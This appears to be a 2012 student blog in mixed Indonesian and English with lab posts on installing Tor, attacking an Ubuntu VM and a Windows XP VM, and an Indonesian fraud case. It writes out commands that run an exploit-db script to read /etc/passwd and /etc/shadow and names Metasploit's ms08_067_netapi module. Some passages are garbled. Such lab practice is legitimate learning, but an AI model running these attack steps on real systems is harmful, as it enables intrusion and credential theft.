SCX020C072
Kamis, 20 September 2012
Selasa, 18 September 2012
Process Install TOR
Congratulations. Your browser is configured to use Tor.
successful configuration, the IP address IP Appears to be: 77,247,181,163
and now Able to open website
Using the ls command to display the contents of the directory
extract the file tor-browser-gnu-linux-i686-2.2.39-1-dev-en-US.tar.gz
Menggunakan perintah ls untuk menampilkan isi direktori
Proses imunisasi meliputi Instal TOR
The following is the command to
root @ bt: ~ / tor-browser en-US #. / start-tor-browser
and TOR ready to run
Senin, 17 September 2012
Privilege Escalation os UBUNTU in Virtualbox
First we did a scan ip with Zenmap, or by using the following command nmap-v-A Ip target <192.168.56.101>


then we will try to use exploitdb application, use the command . / linux ssh remote searchsploit
terus kita gunakan perintah selanjutnya perl platforms/multiple/remote/2017.pl 192.168.56.101 10000 /etc/passwd 0 untuk mengetahui kode masuk atau login
and the next type <perl platforms/multiple/remote/2017.pl 192.168.43.101 10 000 /etc/shadow 0> to know the login password.
Sabtu, 15 September 2012
Exploitation smb in Windows XP using Metasploit
The first thing we must do before windows xp with metasploit exploitation is the target ip scan using Zenmap application.
early stage we open metasploit and input search command to see smb smb we were looking for.
If all phases are done and the position already in the system windows xp then we can go and call some system inside.use exploit/window/smb/ms08_067_netapi
the current system is ready for exploitation windaow xp
Rabu, 12 September 2012
cybrcrime cases that occurred in Indonesia
Internet users should also be alert to
the scams mode sites that offer assistance programs as well as
multi-level marketing (MLM). As the program named Given in Freedom
Trust (GIFT) from a site that was located at
http://www.entersatu.com/danahibah. In this program, the organizers
lure for grant funds obtained from a group of wealthy benefactors
from several countries for individuals or corporations, provided the
financial resources to send a particular account without a name. The
program is tantalizing because for each individual applicant can get
760 dollars / month and $ 3,000 / month for the company.
This criminal activity, modes of
deception. This crime has a motive cybercrime as an act of pure evil.
This is because the organizers deliberately create a site to deceive
readers or masyaralat site. Cybercrime cases this can include the
type of illegal contents. The objective of these crimes is cybercrime
attack individual (against person).tentang
penipuan
Pasal 378 KUHP tentang penipuan
Selasa, 11 September 2012
isntal windows xp virtualbox
Please type the name of the new virtual disk file into the box below or click on the folder icon to select a different folder to create the file in.
clnow its time
to install the windows OS as normally. the step is. click the
'devices'menu -> cd->and click menu 'choose file' it mean
you choose windows OS master with .iso file type, after
that you get in the installation process windows OS.ick next for
the next stageata
allocate some RAM memory for the base,
for example I use a memory of 532


















